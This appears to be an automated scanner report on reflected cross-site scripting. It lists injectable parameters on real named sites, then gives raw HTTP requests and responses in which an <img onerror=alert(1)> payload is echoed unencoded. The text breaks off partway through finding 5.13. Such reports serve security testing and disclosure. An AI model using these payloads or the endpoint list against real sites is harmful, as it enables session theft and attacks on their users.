http://img.mediaplex.com/content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js [mpck parameter]
http://img.mediaplex.com/content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js [mpvc parameter]
http://img.mediaplex.com/content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js [mpvc parameter]
http://imp.fetchback.com/serve/fb/adtag.js [clicktrack parameter]
http://imp.fetchback.com/serve/fb/adtag.js [name of an arbitrarily supplied request parameter]
http://imp.fetchback.com/serve/fb/adtag.js [type parameter]
http://jlinks.industrybrains.com/jsct [ct parameter]
http://jlinks.industrybrains.com/jsct [name of an arbitrarily supplied request parameter]
http://jlinks.industrybrains.com/jsct [tr parameter]
http://js.www.reuters.com/recommend/re/re [callback parameter]
http://lingows.appspot.com/bubble/ [request_id parameter]
http://lingows.appspot.com/bubble/ [respond_path parameter]
http://lingows.appspot.com/content/LSXLXVUXQN/ [request_id parameter]
http://lingows.appspot.com/content/LSXLXVUXQN/ [respond_path parameter]
http://lingows.appspot.com/content/ZXANLLFMOV/ [request_id parameter]
http://lingows.appspot.com/content/ZXANLLFMOV/ [respond_path parameter]
http://premium.mookie1.com/2/nbc.com/ac@Bottom3 [REST URL parameter 2]
http://premium.mookie1.com/2/nbc.com/ac@Bottom3 [REST URL parameter 3]
http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [callback parameter]
http://trc.taboolasyndication.com/reuters/trc/2/json [cb parameter]
http://www.linkedin.com/countserv/count/share [url parameter]
http://www.publish2.com/newsgroups/state-worker.js [_ parameter]
http://www.publish2.com/newsgroups/state-worker.js [jsonp_callback parameter]
http://www.publish2.com/newsgroups/state-worker.js [name of an arbitrarily supplied request parameter]
http://www.reuters.com/assets/commentsChild [articleId parameter]
http://www.reuters.com/assets/commentsChild [channel parameter]
http://www.reuters.com/assets/newsFlash [&flashPath parameter]
http://www.reuters.com/assets/newsFlash [&flashPath parameter]
http://www.reuters.com/assets/newsFlash [h parameter]
http://www.reuters.com/assets/newsFlash [w parameter]
http://www.reuters.com/assets/searchIntercept [blob parameter]
http://www.scribd.com/embeds/63688924/content [start_page parameter]
https://www.sprint.net/min/ [REST URL parameter 1]
https://www.sprint.net/performance [REST URL parameter 1]
https://www.sprint.net/performance/ [REST URL parameter 1]
https://www.sprint.net/performance/ [name of an arbitrarily supplied request parameter]
https://www.sprint.net/performance/gen_line_xml.php [REST URL parameter 1]
https://www.sprint.net/performance/gen_line_xml.php [REST URL parameter 2]
https://www.sprint.net/performance/gen_pop_xml.php [REST URL parameter 1]
https://www.sprint.net/performance/gen_pop_xml.php [REST URL parameter 2]
https://www.sprint.net/performance/performance.swf [REST URL parameter 1]
https://www.sprint.net/performance/performance.swf [REST URL parameter 2]
http://www.und.com/sports/m-footbl/9873956 [REST URL parameter 1]
http://www.und.com/sports/m-footbl/9873956 [REST URL parameter 2]
http://www.und.com/sports/m-footbl/9873956 [REST URL parameter 3]
http://www.und.com/sports/m-footbl/9873956 [name of an arbitrarily supplied request parameter]
http://www.und.com/sports/m-footbl/9874134 [REST URL parameter 1]
http://www.und.com/sports/m-footbl/9874134 [REST URL parameter 2]
http://www.und.com/sports/m-footbl/9874134 [REST URL parameter 3]
http://www.und.com/sports/m-footbl/9874134 [name of an arbitrarily supplied request parameter]
http://optimized-by.rubiconproject.com/a/4462/5032/7102-15.js [ruid cookie]
http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html [ruid cookie]
http://rma-api.gravity.com/v1/beacons/initialize [vaguid cookie]
http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [JSESSIONID cookie]

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

5.1. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0026084b [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0026084b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 2fd86<img%20src%3da%20onerror%3dalert(1)>af4802e2c43 was submitted in the REST URL parameter 9. This input was echoed as 2fd86<img src=a onerror=alert(1)>af4802e2c43 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0026084b2fd86<img%20src%3da%20onerror%3dalert(1)>af4802e2c43?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:06:42 GMT
Connection: close

Unable to find /ProvideCommerce/P0026084b2fd86<img src=a onerror=alert(1)>af4802e2c43

5.2. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0054242b [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0054242b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 49c07<img%20src%3da%20onerror%3dalert(1)>86ab35ef3ef was submitted in the REST URL parameter 9. This input was echoed as 49c07<img src=a onerror=alert(1)>86ab35ef3ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0054242b49c07<img%20src%3da%20onerror%3dalert(1)>86ab35ef3ef?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:06:15 GMT
Connection: close

Unable to find /ProvideCommerce/P0054242b49c07<img src=a onerror=alert(1)>86ab35ef3ef

5.3. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0057916b [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0057916b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 56b44<img%20src%3da%20onerror%3dalert(1)>5949f4937c0 was submitted in the REST URL parameter 9. This input was echoed as 56b44<img src=a onerror=alert(1)>5949f4937c0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0057916b56b44<img%20src%3da%20onerror%3dalert(1)>5949f4937c0?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:05:13 GMT
Connection: close

Unable to find /ProvideCommerce/P0057916b56b44<img src=a onerror=alert(1)>5949f4937c0

5.4. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0071881 [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0071881

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 30b2f<img%20src%3da%20onerror%3dalert(1)>5d12361a7b4 was submitted in the REST URL parameter 9. This input was echoed as 30b2f<img src=a onerror=alert(1)>5d12361a7b4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P007188130b2f<img%20src%3da%20onerror%3dalert(1)>5d12361a7b4?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 84
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:06:13 GMT
Connection: close

Unable to find /ProvideCommerce/P007188130b2f<img src=a onerror=alert(1)>5d12361a7b4

5.5. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0073727b [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0073727b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload b573e<img%20src%3da%20onerror%3dalert(1)>554311b6c84 was submitted in the REST URL parameter 9. This input was echoed as b573e<img src=a onerror=alert(1)>554311b6c84 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0073727bb573e<img%20src%3da%20onerror%3dalert(1)>554311b6c84?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:06:02 GMT
Connection: close

Unable to find /ProvideCommerce/P0073727bb573e<img src=a onerror=alert(1)>554311b6c84

5.6. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0090481b [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0090481b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 1047c<img%20src%3da%20onerror%3dalert(1)>2e316f78077 was submitted in the REST URL parameter 9. This input was echoed as 1047c<img src=a onerror=alert(1)>2e316f78077 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0090481b1047c<img%20src%3da%20onerror%3dalert(1)>2e316f78077?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:06:41 GMT
Connection: close

Unable to find /ProvideCommerce/P0090481b1047c<img src=a onerror=alert(1)>2e316f78077

5.7. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0105447b [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0105447b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 7c462<img%20src%3da%20onerror%3dalert(1)>76984cbffb3 was submitted in the REST URL parameter 9. This input was echoed as 7c462<img src=a onerror=alert(1)>76984cbffb3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0105447b7c462<img%20src%3da%20onerror%3dalert(1)>76984cbffb3?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:05:19 GMT
Connection: close

Unable to find /ProvideCommerce/P0105447b7c462<img src=a onerror=alert(1)>76984cbffb3

5.8. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0105684b [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0105684b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload b1157<img%20src%3da%20onerror%3dalert(1)>920787cad49 was submitted in the REST URL parameter 9. This input was echoed as b1157<img src=a onerror=alert(1)>920787cad49 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0105684bb1157<img%20src%3da%20onerror%3dalert(1)>920787cad49?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:05:58 GMT
Connection: close

Unable to find /ProvideCommerce/P0105684bb1157<img src=a onerror=alert(1)>920787cad49

5.9. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0106998b [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0106998b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 966ec<img%20src%3da%20onerror%3dalert(1)>cb6928d315 was submitted in the REST URL parameter 9. This input was echoed as 966ec<img src=a onerror=alert(1)>cb6928d315 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0106998b966ec<img%20src%3da%20onerror%3dalert(1)>cb6928d315?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 84
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:05:16 GMT
Connection: close

Unable to find /ProvideCommerce/P0106998b966ec<img src=a onerror=alert(1)>cb6928d315

5.10. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000001016X_35172_W1 [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000001016X_35172_W1

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 8719d<img%20src%3da%20onerror%3dalert(1)>48d0d519a3c was submitted in the REST URL parameter 9. This input was echoed as 8719d<img src=a onerror=alert(1)>48d0d519a3c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000001016X_35172_W18719d<img%20src%3da%20onerror%3dalert(1)>48d0d519a3c?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 103
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:06:05 GMT
Connection: close

Unable to find /ProvideCommerce/PCR10_00000001016X_35172_W18719d<img src=a onerror=alert(1)>48d0d519a3c

5.11. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_000000076432_66228_W1_SQ [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_000000076432_66228_W1_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 5ad2c<img%20src%3da%20onerror%3dalert(1)>a2783a548b0 was submitted in the REST URL parameter 9. This input was echoed as 5ad2c<img src=a onerror=alert(1)>a2783a548b0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_000000076432_66228_W1_SQ5ad2c<img%20src%3da%20onerror%3dalert(1)>a2783a548b0?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 106
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:06:24 GMT
Connection: close

Unable to find /ProvideCommerce/PCR10_000000076432_66228_W1_SQ5ad2c<img src=a onerror=alert(1)>a2783a548b0

5.12. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000007G437_68702_W1_SQ [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000007G437_68702_W1_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 90233<img%20src%3da%20onerror%3dalert(1)>4af1509f708 was submitted in the REST URL parameter 9. This input was echoed as 90233<img src=a onerror=alert(1)>4af1509f708 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000007G437_68702_W1_SQ90233<img%20src%3da%20onerror%3dalert(1)>4af1509f708?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 106
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:06:17 GMT
Connection: close

Unable to find /ProvideCommerce/PCR10_00000007G437_68702_W1_SQ90233<img src=a onerror=alert(1)>4af1509f708

5.13. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000007H355_69865_W2_SQ [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000007H355_69865_W2_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload dde05<img%20src%3da%20onerror%3dalert(1)>7b7dbc8df13 was submitted in the REST URL parameter 9. This input was echoed as dde05<img src=a onerror=alert(1)>7b7dbc8df13 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

